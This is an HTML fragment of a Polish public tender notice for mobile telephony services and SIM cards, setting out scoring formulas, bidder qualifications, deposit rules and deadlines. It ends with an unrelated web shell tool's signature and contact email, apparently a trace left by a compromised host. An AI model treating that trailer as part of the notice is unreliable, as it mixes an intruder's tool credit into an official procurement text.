(OPZ) – stanowiącym Załącznik nr 1 do SWZ zamieszczone są na stronie internetowej prowadzonego postępowania pod adresem: https://platformazakupowa.pl/pn/kwp_radom<br/>b)Projektowanych postanowieniach umowy - Załączniku nr 2 do SWZ zamieszczone są na stronie<br/>internetowej prowadzonego postępowania pod adresem: https://platformazakupowa.pl/pn/kwp_radom </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">64212000-5 - Usługi telefonii komórkowej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami:<br/>a.	cena - 60 %<br/>b.	pakiet Internetu dla pojedynczego numeru - 40 %,<br/><br/>KRYTERIUM I – Cena(C)<br/>SPOSÓB OBLICZANIA PUNKTÓW DLA KRYTERIUM I – Cena<br/>Cena oferty brutto<br/>waga 60% – cena oferty brutto (C)<br/><br/>Dla kryterium – „cena oferty brutto”, ilość punktów będzie obliczona wg wzoru:<br/><br/>C = (CN/ CO) x 60<br/>gdzie:<br/>C - przyznane punkty w kryterium cena, <br/>CN- najniższa cena ofertowa (brutto) spośród wszystkich ofert podlegających ocenie, <br/>Co - cena oferty ocenianej (brutto). <br/><br/>KRYTERIUM II – pakiet Internetu dla pojedynczego numeru (G)<br/>SPOSÓB OBLICZANIA PUNKTÓW DLA KRYTERIUM II – pakiet Internetu <br/>dla pojedynczego numeru<br/><br/>Wykonawca zobowiązany jest wypełnić Formularz ofertowy wpisując zaoferowany pakiet Internetu dla pojedynczego numeru tj. liczbę GB pakietu Internetu dla pojedynczego numeru. <br/><br/>W przypadku:<br/>	zaoferowania pakiet Internetu dla pojedynczego numeru 70 GB do 79 GB Zamawiający przyzna <br/>0 pkt.<br/> zaoferowania pakiet Internetu dla pojedynczego numeru 80 GB do 89 GB Zamawiający przyzna 10 pkt.<br/>	zaoferowania pakiet Internetu dla pojedynczego numeru 90 GB do 94 GB Zamawiający przyzna 20 pkt.<br/> zaoferowania pakiet Internetu dla pojedynczego numeru 95 GB Zamawiający przyzna 30 pkt.<br/> zaoferowania pakiet Internetu dla pojedynczego numeru 100 GB Zamawiający przyzna 40 pkt.<br/>	Wymagany minimalny pakiet Internetu dla pojedynczego numeru 70 GB. <br/><br/>Zamawiający po przekroczeniu zaoferowanego transferu danych dopuszcza możliwość zmiany parametrów technicznych transmisji danych (obniżenie prędkości transmisji) do poziomu minimum 10 Mb/s.<br/><br/>W przypadku zaoferowania pakietu Internetu dla pojedynczego numeru poniżej 70 GB oferta podlegać będzie odrzuceniu.<br/><br/>Łączna ilość punktów ocenianej oferty (łączna punktacja): <br/>W = C + G<br/>gdzie: <br/>W – łączna punktacja, <br/>C – punkty za cenę, <br/>G – pakiet Internetu dla pojedynczego numeru,</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">pakiet Internetu dla pojedynczego numeru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału <br/>w postępowaniu dotyczące:<br/>1. Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – warunek zostanie spełniony, jeżeli Wykonawca jest wpisany do rejestru przedsiębiorców telekomunikacyjnych i posiada aktualne zaświadczenie Prezesa Urzędu Komunikacji Elektronicznej o wpisie do rejestru przedsiębiorców telekomunikacyjnych , zgodnie z ustawa z dnia z dnia 16 lipca 2004 roku Prawo telekomunikacyjne (Dz. U z 2021 r. poz. 576).<br/><br/>Uwaga. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia ww. warunek będzie spełniony jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielne zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi do realizacji których te uprawnienia są wymagane. <br/>2. zdolności technicznej lub zawodowej - Zamawiający uzna wymieniony warunek za spełniony, jeżeli Wykonawca wykaże, że:<br/>a) posiada doświadczenie w przedmiocie zamówienia i wykaże, że wykonał lub wykonuje usługi, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy polegające <br/>na świadczeniu usługi telefonii komórkowej o wartości co najmniej 50 000,00 zł. brutto <br/><br/>Wykonawca zobowiązany będzie złożyć NA WEZWANIE: Wykaz usług <br/> <br/>b) dysponuje lub będzie dysponował osobami zdolnymi do realizacji zamówienia tj. co najmniej jedną osobą realizującą zamówienia w zakresie czynności opiekuna Zamawiającego polegające na monitorowaniu prawidłowej realizacji usługi.<br/><br/>Wykonawca zobowiązany będzie złożyć NA WEZWANIE: Wykaz osób <br/><br/>UWAGA: Zamawiający oceni czy wykonawca spełnia warunki udziału w postępowaniu na podstawie ZŁOŻONEGO WRAZ Z OFERTĄ oświadczenia składanego na podstawie art. 125 ust. 1 ustawy Pzp <br/>o spełnianiu warunków udziału w postępowaniu i na podstawie wykazu usług składanego NA WEZWANIE zamawiającego stanowiącego oraz wykazu osób składanego NA WEZWANIE zamawiającego .<br/>W przypadku złożenia oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek dotyczący posiadania zdolności technicznej lub zawodowej będzie spełniony, jeżeli co najmniej jeden <br/>z wykonawców wspólnie ubiegających się o udzielenie zamówienia wykonał usługę, a w przypadku świadczeń powtarzających się lub ciągłych również wykonuje, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania <br/>i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, <br/>o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca <br/>z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; <br/>w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy <br/>polegające na świadczeniu usługi telefonii komórkowej o wartości co najmniej 50 000,00 zł. brutto <br/><br/><br/>W przypadku złożenia oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum spółka cywilna) wykonawcy ubiegający się wspólnie o udzielenie zamówienia muszą złożyć wraz z ofertą oświadczenie z którego wynika, które usługi wykonają poszczególni wykonawcy <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający będzie żądał NA WEZWANIE od Wykonawcy, którego oferta zostanie najwyżej oceniona do złożenia w wyznaczonym przez Zamawiającego terminie, nie krótszym niż 5 dni aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>a)	wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; <br/>w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy; polegających na świadczeniu usługi telefonii komórkowej wraz z dostawą kart.<br/><br/>b)	wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za realizację zamówienia tj. wykonujących czynności opiekuna Zamawiającego polegające na monitorowaniu prawidłowej realizacji usługi wraz z informacjami dotyczącymi zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami .<br/><br/>c)	aktualnego zaświadczenia o wpisie do rejestru przedsiębiorców telekomunikacyjnych wydanego na podstawie ustawy z dnia 16 lipca 2004 roku Prawo telekomunikacyjne (Dz. U z 2021 r. poz. 576).<br/><br/>UWAGA: NIE NALEŻY SKŁADAĆ WRAZ Z OFERTĄ !</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Formularz oferty wypełniony we wszystkich pozycjach <br/>2.	Oświadczenie wykonawcy o niepodleganiu wykluczeniu z postępowania .W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o niepodleganiu wykluczeniu składa każdy z wykonawców. W przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby wykonawca, załącza do oferty także oświadczenie podmiotu udostępniającego zasoby (podpisane przez podmiot udostępniający zasoby) potwierdzające brak podstaw wykluczenia tego podmiotu;<br/>3.	Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu .W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o spełnianiu warunków udziału w postępowaniu składa każdy z wykonawców. W przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby wykonawca, załącza do oferty oświadczenie podmiotu udostępniającego zasoby (podpisane przez podmiot udostępniający zasoby), potwierdzające spełnianie warunków udziału w postępowaniu, w zakresie w jakim wykonawca powołuje się na jego zasoby.<br/>4.	Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna) o którym mowa w art. 117 ust. 4 ustawy, z którego wynika, które usługi wykonają poszczególni wykonawcy.<br/>5.	Zobowiązanie podmiotu udostępniającego do oddania wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie będzie dysponował niezbędnymi zasobami tych podmiotów w związku z powołaniem się na te zasoby celem spełnienia przez wykonawcę warunków udziału w postępowaniu - składa wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby .<br/>6.	Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik.<br/>7.	Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna) – dotyczy ofert składanych przez wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>8. Dokument potwierdzający zabezpieczenie oferty akceptowalną formą wadium. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w wysokości: 4 300,00 zł.<br/><br/>1.	Wadium wnosi się przed upływem terminu składania ofert.<br/>2.	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1)	pieniądzu; <br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>3.	Wadium w formie pieniądza należy wnieść przelewem na rachunek bankowy o numerze:<br/>49 1010 1010 0022 1913 9120 0000<br/>z dopiskiem „Wadium – nr postępowania 25/22”<br/><br/><br/>UWAGA: <br/>Za termin wniesienia wadium w formie pieniądza zostanie przyjęty termin uznania rachunku zamawiającego.<br/><br/>4.	Wadium wnoszone w formie gwarancji lub poręczenia o którym mowa w pkt. 2 ppkt 4) musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1)	musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie PZP;<br/>2)	z jej treści powinno jednoznacznie wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>3)	powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4)	termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert); <br/>5)	w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>6)	beneficjentem poręczenia lub gwarancji jest: …<br/>7)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 PZP), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>5.	Oferta wykonawcy, który nie wniósł wadium, lub wniósł wadium w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 PZP zostanie odrzucona.<br/>6.	Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1 - 5 ustawy Pzp.<br/>7.	Zamawiający zatrzymuje wadium wraz z odsetkami w przypadkach określonych w art. 98 ust. 6 ustawy Pzp <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Przed podpisaniem umowy wykonawcy wspólnie ubiegający się o udzielenie zamówienia (w przypadku wyboru oferty jako najkorzystniejszej) przedstawią zamawiającemu kopię umowy regulującej współpracę tych wykonawców.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepodleganiu wykluczeniu składa każdy z Wykonawców. <br/>W przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby Wykonawca, załącza do oferty oświadczenie podmiotu udostępniającego zasoby (podpisane przez podmiot udostępniający zasoby), potwierdzające spełnianie warunków udziału w postępowaniu, w zakresie w jakim<br/>Wykonawca powołuje się na jego zasoby.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o spełnianiu warunków udziału w postępowaniu składa każdy z Wykonawców. W przypadku polegania<br/>na zdolnościach lub sytuacji podmiotów udostępniających zasoby Wykonawca, załącza do oferty oświadczenie podmiotu udostępniającego zasoby (podpisane przez podmiot udostępniający zasoby), potwierdzające spełnianie warunków udziału w postępowaniu, w zakresie w jakim Wykonawca powołuje się na jego zasoby.<br/>Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia (dotyczy konsorcjum/spółki cywilnej) <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy w sprawie zamówienia, które zostaną wprowadzone do treści tej umowy, określone zostały w – projekcie umowy<br/><br/>1. Zamawiający dopuszcza zmianę postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy, w następujących przypadkach i na niżej określonych warunkach:<br/>1)	Zamawiający dopuszcza zmianę wysokości wynagrodzenia należnego Wykonawcy, o którym mowa <br/>w § 5 ust. 1 i 2 w przypadku zmiany:<br/>a)	stawki podatku od towarów i usług oraz podatku akcyzowego,<br/>b)	wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,<br/>c)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub ubezpieczenie zdrowotne,<br/>d)	zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (Dz. U. poz. 2215 oraz z 2019 r. poz. 1074 i 1572) - jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.<br/>2)	Zamawiający dopuszcza zmianę wysokości wynagrodzenia należnego Wykonawcy, w przypadku zmiany ceny materiałów lub kosztów związanych z realizacją umowy tj. wzrostu lub obniżenia względem ceny lub kosztu dla wynagrodzenia ofertowego, w oparciu o wskaźnik wzrostu cen towarów i usług konsumpcyjnych określony przez GUS, dotyczący cen wpływających na realizację przedmiotu usługi. Nowe wynagrodzenie obowiązuje od dnia podpisania aneksu do umowy, z zastrzeżeniem, że pierwsza waloryzacja może nastąpić nie wcześniej niż po upływie 12 miesięcy od dnia obowiązywania umowy. Strona wnioskująca o zmianę wynagrodzenia dokona wyliczenia zmian cen jednostkowych i różnic po waloryzacji. Strony dopuszczają waloryzację, jeżeli zmiana wskaźnika cen przekroczy 10% w stosunku do wielkości wskaźnika w chwili zawarcia umowy.<br/>3) Wzrost liczony jest wyłącznie w stosunku do zakresu pozostającego do wykonania po upływie<br/> 12 miesięcy od dnia zawarcia umowy.<br/>2.	W przypadkach, o których mowa w ust. 1 zmiana wymaga wniosku jednej ze stron umowy.<br/>3.	W przypadku, o którym mowa w ust. 1, pkt. 1) ppkt. a) wysokość zmiany wynagrodzenia odpowiadać będzie wysokości zmiany stawki podatku od towarów i usług oraz podatku akcyzowego.<br/>4.	W przypadkach, o których mowa w ust. 1 pkt. 1) ppkt. b, c i d, Strona wnioskująca o zmianę wynagrodzenia obowiązana jest wykazać drugiej Stronie czy i jaki wpływ zmiany te będą miały <br/>na koszty wykonania zamówienia przez Wykonawcę.<br/>Zmiany umowy wymagają zachowania formy pisemnej pod rygorem nieważności i obowiązywać będą od dnia podpisania przez Strony aneksu w tym zakresie.<br/>5.	Umowa obowiązuje od dnia zawarcia, z tym, że usługi telekomunikacyjne będą świadczone od dnia 24.07.2022 r. przez okres 24 miesięcy, lub do wcześniejszego wyczerpania limitu kwoty określonej <br/>w § 5 ust. 1 projektu umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-01 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Platformy pod adresem: https://platformazakupowa.pl/pn/kwp_radom</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-01 12:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-30</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawca zobowiązany jest zrealizować przedmiot zamówienia - od dnia zawarcia umowy z tym, że usługi telekomunikacyjne będą świadczone od dnia 24.07.2022 r. przez okres 24 miesięcy, dostawa kart SIM do 30.06.2022 r.<br/>Wymaga zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy Pzp <br/>1.	Wykonawca lub podwykonawca zobowiązuje się, że osoby wykonujące czynności opiekuna Zamawiającego polegające na monitorowaniu prawidłowej realizacji usługi będą zatrudnione na podstawie umowy o pracę przez cały okres trwania umowy w rozumieniu przepisów ustawy z dnia 26 czerwca 1974 r. Kodeks pracy (Dz. U. z 2020 r. poz. 1320 z późn. zm.). <br/>2.	Wykonawca nie później niż w dniu rozpoczęcia usługi zobowiązany będzie złożyć Zamawiającemu informację dotyczącą osób zatrudnionych na umowę o pracę skierowanych do realizacji przedmiotowego zamówienia, o których mowa w ust. 1, zawierającą imiona i nazwiska osób.<br/>3.	Dane zawarte w informacji, o której mowa w ust. 2 nie mogą naruszać ustawy z dnia 10.05.2018 r. o ochronie danych osobowych. Imię i nazwisko pracownika nie podlega anonimizacji. Informacje takie jak: data zawarcia umowy, rodzaj umowy o pracę i wymiar etatu powinny być możliwe do zidentyfikowania.<br/>4.	Wykonawca jest zobowiązany do raportowania stanu zatrudnienia osób przez cały okres realizacji umowy na każde wezwanie Zamawiającego poprzez złożenie: <br/>1)	oświadczenia zatrudnionego pracownika,<br/>2)	oświadczenia wykonawcy lub podwykonawcy o zatrudnieniu pracownika na podstawie umowy o pracę,<br/>3)	poświadczonej za zgodność z oryginałem kopii umowy o pracę zatrudnionego pracownika,

Creat By MiNi SheLL
Email: jattceo@gmail.com